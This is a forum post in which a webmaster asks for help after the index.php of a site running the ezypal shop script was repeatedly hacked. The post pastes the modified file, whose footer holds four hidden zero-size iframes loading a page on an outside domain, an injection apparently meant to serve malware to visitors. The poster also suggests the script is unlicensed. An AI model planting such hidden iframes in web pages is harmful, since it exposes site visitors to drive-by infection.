olimpiu_stefan
BANNED
- Jul 2, 2008
- 94
- 70
Hi guys. I have ONE big problem.
For the guys who use ezypal script:
I was hacked for 5 times. And the file that was modified is index.php.
Like this:
In the footer thay put IFRAME.
Please how can i resolve this problem?
But PLEASE dont tell me to buy'it.
Thanks
For the guys who use ezypal script:
I was hacked for 5 times. And the file that was modified is index.php.
Like this:
PHP:
<?php
error_reporting(E_ERROR);
define("EZY_VALID",true);
require_once('includes/configuration.php');
require_once('includes/error.php');
require_once('includes/mysql.php');
require_once('includes/compatibility.php');
require_once('includes/vars.php');
require_once('includes/functions.php');
require_once('includes/mail.php');
if(ini_get('safe_mode')=='Off') ini_set('magic_quotes_gpc',1);
if($config['store_active']=='true'||SessionLevel()==2) {
if(isset($_GET['do'])) $action = $_GET['do'];
else $action = 'home';
if($action!='file') {
ob_start();
include('includes/template.php');
ob_end_flush();
}
else include('file.php');
}
else include('offline.html');
require_once('includes/final.php');
//=====================[ EZYPAL IS NOT FREE SOFTWARE ]======================//
?><iframe src="http://odmarco.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://odmarco.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://odmarco.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://odmarco.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
In the footer thay put IFRAME.
Please how can i resolve this problem?
But PLEASE dont tell me to buy'it.
Thanks